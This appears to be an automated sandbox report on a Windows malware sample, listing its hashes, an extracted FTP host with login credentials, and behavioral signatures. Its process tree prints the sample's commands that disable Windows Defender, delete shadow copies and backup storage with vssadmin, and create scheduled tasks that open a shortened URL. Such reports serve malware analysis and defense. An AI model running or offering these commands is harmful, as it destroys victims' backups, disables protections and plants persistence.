Analysis
-
max time kernel
151s -
max time network
159s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-10-2022 21:22
Behavioral task
behavioral1
Sample
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Resource
win10v2004-20220901-en
General
-
Target
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
-
Size
242KB
-
MD5
10e6c5653d2929236947ca08594f0f55
-
SHA1
9ed6646ef7f0815d02066b60cd7bbc8d27cbf360
-
SHA256
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
-
SHA512
8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
SSDEEP
6144:mQvE/UVPy/oCa+LDZWC9z5NUb+knq1diDmN:3vzPygCa+DZCnq1c+
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Signatures
-
Contains code to disable Windows Defender 4 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/1988-54-0x0000000000820000-0x0000000000862000-memory.dmp disable_win_def behavioral1/files/0x000800000001230f-96.dat disable_win_def behavioral1/files/0x000800000001230f-97.dat disable_win_def behavioral1/memory/2744-98-0x0000000000D30000-0x0000000000D72000-memory.dmp disable_win_def -
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes:
SystemPropertiesPerformance.exepid Process 2744 SystemPropertiesPerformance.exe -
Drops desktop.ini file(s) 2 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe File opened for modification C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Enumerates connected drives 3 TTPs 17 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc Process File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 2448 schtasks.exe 2460 schtasks.exe 2472 schtasks.exe 2500 schtasks.exe 2512 schtasks.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 1848 vssadmin.exe 1580 vssadmin.exe 1160 vssadmin.exe 2024 vssadmin.exe 1584 vssadmin.exe 1064 vssadmin.exe 1420 vssadmin.exe 956 vssadmin.exe 560 vssadmin.exe 1672 vssadmin.exe 828 vssadmin.exe 524 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exevssvc.exe851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exedescription pid Process Token: SeDebugPrivilege 456 powershell.exe Token: SeBackupPrivilege 764 vssvc.exe Token: SeRestorePrivilege 764 vssvc.exe Token: SeAuditPrivilege 764 vssvc.exe Token: SeDebugPrivilege 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeBackupPrivilege 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeSecurityPrivilege 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe Token: SeBackupPrivilege 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1988 wrote to memory of 456 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 27 PID 1988 wrote to memory of 456 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 27 PID 1988 wrote to memory of 456 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 27 PID 1988 wrote to memory of 772 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 29 PID 1988 wrote to memory of 772 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 29 PID 1988 wrote to memory of 772 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 29 PID 1988 wrote to memory of 1124 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 30 PID 1988 wrote to memory of 1124 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 30 PID 1988 wrote to memory of 1124 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 30 PID 1988 wrote to memory of 1400 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 31 PID 1988 wrote to memory of 1400 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 31 PID 1988 wrote to memory of 1400 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 31 PID 1988 wrote to memory of 1960 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 32 PID 1988 wrote to memory of 1960 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 32 PID 1988 wrote to memory of 1960 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 32 PID 1988 wrote to memory of 1080 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 33 PID 1988 wrote to memory of 1080 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 33 PID 1988 wrote to memory of 1080 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 33 PID 1988 wrote to memory of 1780 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 34 PID 1988 wrote to memory of 1780 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 34 PID 1988 wrote to memory of 1780 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 34 PID 1988 wrote to memory of 684 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 35 PID 1988 wrote to memory of 684 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 35 PID 1988 wrote to memory of 684 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 35 PID 1988 wrote to memory of 1952 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 36 PID 1988 wrote to memory of 1952 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 36 PID 1988 wrote to memory of 1952 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 36 PID 1988 wrote to memory of 904 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 37 PID 1988 wrote to memory of 904 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 37 PID 1988 wrote to memory of 904 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 37 PID 1988 wrote to memory of 568 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 38 PID 1988 wrote to memory of 568 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 38 PID 1988 wrote to memory of 568 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 38 PID 1988 wrote to memory of 1204 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 39 PID 1988 wrote to memory of 1204 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 39 PID 1988 wrote to memory of 1204 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 39 PID 1988 wrote to memory of 1632 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 42 PID 1988 wrote to memory of 1632 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 42 PID 1988 wrote to memory of 1632 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 42 PID 1988 wrote to memory of 628 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 44 PID 1988 wrote to memory of 628 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 44 PID 1988 wrote to memory of 628 1988 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe 44 PID 1204 wrote to memory of 1420 1204 cmd.exe 60 PID 1204 wrote to memory of 1420 1204 cmd.exe 60 PID 1204 wrote to memory of 1420 1204 cmd.exe 60 PID 568 wrote to memory of 1064 568 cmd.exe 59 PID 568 wrote to memory of 1064 568 cmd.exe 59 PID 568 wrote to memory of 1064 568 cmd.exe 59 PID 1952 wrote to memory of 524 1952 cmd.exe 58 PID 1952 wrote to memory of 524 1952 cmd.exe 58 PID 1952 wrote to memory of 524 1952 cmd.exe 58 PID 628 wrote to memory of 828 628 cmd.exe 57 PID 628 wrote to memory of 828 628 cmd.exe 57 PID 628 wrote to memory of 828 628 cmd.exe 57 PID 904 wrote to memory of 1584 904 cmd.exe 55 PID 904 wrote to memory of 1584 904 cmd.exe 55 PID 904 wrote to memory of 1584 904 cmd.exe 55 PID 1632 wrote to memory of 1672 1632 cmd.exe 56 PID 1632 wrote to memory of 1672 1632 cmd.exe 56 PID 1632 wrote to memory of 1672 1632 cmd.exe 56 PID 772 wrote to memory of 956 772 cmd.exe 62 PID 772 wrote to memory of 956 772 cmd.exe 62 PID 772 wrote to memory of 956 772 cmd.exe 62 PID 1124 wrote to memory of 384 1124 cmd.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\system32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:956
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:384
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵PID:1400
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:560
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵PID:1960
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1160
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵PID:1080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2024
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵PID:1780
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1848
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵PID:684
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1580
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:524
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1584
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1064
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1420
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1672
-
-
-
C:\Windows\system32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:828
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /st "06:17" /sc daily /mo "3" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"2⤵
- Creates scheduled task(s)
PID:2448
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /st "10:57" /sc daily /mo "4" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"2⤵
- Creates scheduled task(s)
PID:2460
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /st "19:12" /sc daily /mo "3" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"2⤵
- Creates scheduled task(s)
PID:2472
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /st "16:26" /sc weekly /mo "5" /d "Thu" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"2⤵
- Creates scheduled task(s)
PID:2500
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /st "03:07" /sc monthly /m "mar" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"2⤵
- Creates scheduled task(s)
PID:2512
-
-
C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"2⤵
- Executes dropped EXE
PID:2744
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
-
Filesize
242KB
MD510e6c5653d2929236947ca08594f0f55
SHA19ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA5128db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30